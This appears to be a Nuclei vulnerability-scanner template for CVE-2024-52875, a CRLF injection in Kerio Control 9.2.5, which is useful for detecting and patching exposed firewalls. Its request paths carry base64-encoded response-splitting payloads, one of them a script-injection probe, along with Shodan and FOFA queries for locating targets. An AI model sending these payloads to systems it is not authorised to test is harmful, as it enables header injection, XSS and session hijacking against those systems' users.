id: CVE-2024-52875 info: name: Kerio Control v9.2.5 - CRLF Injection author: ritikchaddha,iamnoooob,rootxharsh,pdresearch severity: high description: | Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5 impact: | Attackers can perform HTTP response splitting attacks to inject arbitrary HTTP headers and content, potentially leading to XSS, cache poisoning, or session hijacking. remediation: | Update Kerio Control to a version later than 9.2.5 that addresses the CRLF injection vulnerability. reference: - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875 - https://nvd.nist.gov/vuln/detail/CVE-2024-52875 classification: cve-id: CVE-2024-52875 cwe-id: CWE-74 epss-score: 0.29116 epss-percentile: 0.97964 metadata: verified: true max-request: 4 shodan-query: "Kerio Control" fofa-query: "Kerio Control" tags: cve,cve2024,kerio,crlf,vkev,vuln http: - method: GET path: - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d" - "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d" - "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d" - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d" stop-at-first-match: true matchers-condition: or matchers: - type: regex part: header regex: - '(?m)^Crlf:\s*$' - type: dsl dsl: - "contains(body,'')" - 'contains(content_type, "text/html")' - 'contains(location, "")' - 'status_code == 302' condition: and # digest: 490a00463044022041ab1e8010104ee8072dc4d18ac3f4c42ee7a73c2185109155b5ebe2e2738ab0022043f3063cc68ba7219f04e984de4302cb3943bd69065e38642127a0e20c7d4e2e:922c64590222798bb761d5b6d8e72950